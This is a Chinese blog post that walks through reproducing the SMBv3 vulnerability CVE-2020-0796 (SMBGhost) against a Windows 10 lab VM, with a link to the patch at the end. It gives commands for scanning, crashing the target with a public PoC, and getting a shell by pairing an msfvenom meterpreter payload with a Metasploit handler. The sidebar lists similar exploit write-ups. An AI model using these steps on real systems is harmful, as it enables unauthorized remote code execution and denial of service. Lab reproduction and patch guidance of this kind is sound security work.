【漏洞复现】CVE-2020-0796漏洞复现(win10系统)

最新推荐文章于 2024-04-06 15:08:32 发布
最新推荐文章于 2024-04-06 15:08:32 发布
阅读量4.8k 收藏 49
点赞数 4
分类专栏: 系统提权合集 文章标签: win10 CVE-2020-0796 提权 CVE msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_allen/article/details/106677632
版权

前言:

Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。
微软公布了在Server Message Block 3.0(SMBv3)中发现的“蠕虫型”预授权远程代码执行漏洞。

影响版本:

	适用于32位系统的Windows 10版本1903
	Windows 10 1903版(用于基于x64的系统)
	Windows 10 1903版(用于基于ARM64的系统)
	Windows Server 1903版(服务器核心安装)
	适用于32位系统的Windows 10版本1909
	Windows 10版本1909(用于基于x64的系统)
	Windows 10 1909版(用于基于ARM64的系统)
	Windows Server版本1909(服务器核心安装)

系统版本查看:

在这里插入图片描述

漏洞复现:

靶机:win10虚拟机、ip:192.168.142.129(防火墙关闭)
攻击机:kali虚拟机、ip:192.168.142.128
1:检测系统是否存在漏洞

git下载地址:https://github.com/ollypwn/SMBGhost

python3 scanner.py 目标ip地址

在这里插入图片描述
2:蓝屏POC:
POC下载地址:https://github.com/eerykitty/CVE-2020-0796-PoC

python3 setup.py install
python3 CVE-2020-0796.py 目标ip地址

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
3:提权POC提权:
POC下载地址:https://github.com/danigargu/CVE-2020-0796
第一步:msf生成反向连接木马:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

在这里插入图片描述
第二步:替换POC中exploit.py中USER_PAYLOAD的代码,并且将buf修改为USER_PAYLOAD
在这里插入图片描述
第三步:启动msf

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //监听端口
set rhost 192.168.1.143 //目标主机
run
在这里插入图片描述

第四步:运行poc,自动建立连接
在这里插入图片描述在这里插入图片描述

修复方式:

微软已经发布了此漏洞的安全补丁,访问如下链接:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

zhzhzh777
关注
  • 4
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub漏洞 CVE-2016-3088
03-14
vulhub漏洞 CVE-2016-3088
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
Windows漏洞:MS08-067远程代码执行漏洞及深度防御
华为云官方博客
11-16 8758
摘要:详细讲解MS08-067远程代码执行漏洞CVE-2008-4250)及防御过程
Windows下的MS17-010(永恒之蓝)漏洞分析与
热门推荐
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
【网络安全---漏洞】Tomcat CVE-2020-1938 漏洞和利用过程
最新发布
m0_60607371的博客
04-06 1003
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
【网络安全---漏洞】shiro550反序列化漏洞原理与漏洞和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 2787
shiro550反序列化漏洞原理与漏洞和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。
【网络安全】CVE 漏洞分析以及
heikeyouyou的博客
05-22 1050
记一次CVE 漏洞分析以及
Redis 未授权访问 CNNVD-201511-230 漏洞
Senimo
05-03 1712
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞1、环境搭建2、漏洞四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
cve-2020-0796_CVE20200796 漏洞(rce)
weixin_39635657的博客
11-30 358
0X00漏洞简介Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。微软公布了在Server Messag...
框架安全-CVE &Apache Shiro&Apache Solr漏洞
rumil的博客
11-02 1596
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
CVE-2020-0796漏洞拿到目标shell权限(附POC)-报错解决-爬坑记录-绕坑必看-永恒之黑-win10漏洞
byt8563的博客
07-13 4917
本实验仅供学习参考,请勿非法利用! 前言 最近终于成功的了下之前比较火的“永恒之黑”,最近正好无意间找到了获取目标Shell的POC。坑点较多(各种报错+蓝屏),本次记录主要是为正在“爬坑”的同学做些参考,希望对您有所帮助。 报错:failed to find PML4 self reference entry! 报错:physical read primitive failed! 蓝屏代码: 漏洞描述 2020年3月,微软公布SMB远程代码执行漏洞CVE-2020-0796)又称“永恒之黑”,该漏洞
CVE_2020_0796重大windows SMB RCE漏洞
weixin_39811856的博客
03-13 485
描述如下: 漏洞是因为操作系统在处理SMBv3协议中的压缩数据包时存在错误处理。 成功构造数据包的攻击者可在远程无验证的条件下利用该漏洞执行任意代码。 易被感染系统: + Windows 10 Version 1903 for 32-bit Systems + Windows 10 Version 1903 for ARM64-based Systems + Windows 1...
【更新】CVE-2020-0796:微软紧急发布SMBv3协议“蠕虫级”漏洞补丁通告
爱国小白帽
03-13 5588
【更新】CVE-2020-0796:微软紧急发布SMBv3协议“蠕虫级”漏洞补丁通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 事件描述 2020年3月11日,360-CERT监测到有海外厂家发布安全规则通告,通告中描述了一处微软SMBv3协议的内存破坏漏洞,编号CVE-2020-0796,并表示该漏洞无需授权验证即可被远程利用,可能形成蠕虫级...
CVE-2020-0796 SMBGhost漏洞
whh6tl的博客
04-26 1944
CVE-2020-0796 SMBGhost漏洞漏洞简介漏洞影响范围利用环境漏洞:搭建环境攻击机:安装python3环境靶机:windows10 1903 x64位系统,关闭防火墙查看靶机IP使用攻击机查看靶机IP是否能ping通使用脚本检测漏洞配置攻击poc所需环境漏洞利用搭建好环境后运行poc靶机蓝屏,漏洞利用成功修建议 漏洞简介 Microsoft Windows和Microso...
SMB-2
H2SO2的专栏
05-14 1305
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
Tomact_CVE-2020-1938漏洞
08-31
Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 漏洞:使用以下命令触发漏洞: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值